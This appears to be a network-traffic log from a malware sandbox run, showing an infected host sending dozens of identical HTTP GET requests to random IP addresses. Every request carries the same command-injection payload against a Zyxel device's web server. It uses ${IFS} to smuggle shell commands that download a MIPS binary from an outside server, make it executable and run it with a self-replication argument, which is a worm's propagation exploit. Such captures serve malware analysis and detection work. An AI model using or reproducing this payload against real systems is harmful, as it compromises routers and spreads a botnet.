                                                  Jan 19, 2024 18:23:56.056684017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4387192.168.2.1351384151.72.46.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056703091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4388192.168.2.1360546116.214.84.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056745052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4389192.168.2.1359686176.152.127.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056792974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4390192.168.2.1352328167.73.20.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056834936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4391192.168.2.1358410131.239.222.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056874037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4392192.168.2.136011485.188.133.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056900024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4393192.168.2.1348480149.29.66.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056941032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4394192.168.2.1333828179.187.17.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056994915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4395192.168.2.1348252217.120.215.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057037115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4396192.168.2.1336154103.215.120.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057085037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4397192.168.2.1340752198.234.185.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057110071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4398192.168.2.1339912163.128.95.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057151079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4399192.168.2.135154018.130.170.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057193995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4400192.168.2.133284654.43.222.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057230949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4401192.168.2.1333432115.155.173.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057255983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4402192.168.2.1354822141.173.69.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057291985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4403192.168.2.1354524193.105.250.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057332039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4404192.168.2.1350258145.166.56.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057372093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4405192.168.2.134845471.207.111.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057416916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4406192.168.2.135568243.58.39.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057452917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4407192.168.2.133865436.99.92.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057499886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4408192.168.2.1333410217.15.217.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057533026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4409192.168.2.1355594140.145.170.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057585955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4410192.168.2.135153692.31.158.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057588100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4411192.168.2.1348358199.182.174.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057641983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4412192.168.2.1356360116.179.175.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057698965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4413192.168.2.1333930193.102.1.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057732105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4414192.168.2.134599449.173.87.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057802916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4415192.168.2.1347814116.72.126.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057823896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4416192.168.2.1345632116.146.18.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057852030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4417192.168.2.1333620152.152.110.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057883978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4418192.168.2.1340034168.34.43.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057929993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4419192.168.2.133709060.85.155.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057950974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4420192.168.2.136099427.145.61.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.057986975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4421192.168.2.1336078219.249.203.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058065891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4422192.168.2.1351670201.103.154.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058187008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4423192.168.2.1339352106.73.143.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058218002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4424192.168.2.1353192169.108.166.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058259010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4425192.168.2.1347112117.99.165.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058270931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4426192.168.2.133758051.172.80.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058303118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4427192.168.2.1350892188.79.96.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058303118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4428192.168.2.1344564208.134.67.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058303118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4429192.168.2.1343258158.160.253.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058348894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4430192.168.2.1353680106.15.249.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058410883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4431192.168.2.1358882129.16.227.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058418989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4432192.168.2.1352276113.21.211.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058460951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4433192.168.2.1340110120.248.162.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058474064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4434192.168.2.1355184178.28.242.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058548927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4435192.168.2.1358662174.156.49.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058563948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4436192.168.2.135504885.151.1.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058604956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4437192.168.2.1343930182.87.246.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058634996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4438192.168.2.1334158179.191.177.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058661938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4439192.168.2.1346316120.199.178.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058697939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4440192.168.2.1357492137.156.150.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058733940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4441192.168.2.1334760185.77.37.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058778048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4442192.168.2.1346748210.82.167.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058895111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4443192.168.2.1335840111.67.179.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058909893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4444192.168.2.1337014136.175.250.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058959007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4445192.168.2.1356876142.206.254.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.058985949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4446192.168.2.1357840139.229.134.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059037924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4447192.168.2.134754668.23.9.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059077978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4448192.168.2.1351210173.117.115.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.059093952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4449192.168.2.1356338117.189.219.59443
                                                  TimestampBytes transferredDirectionData
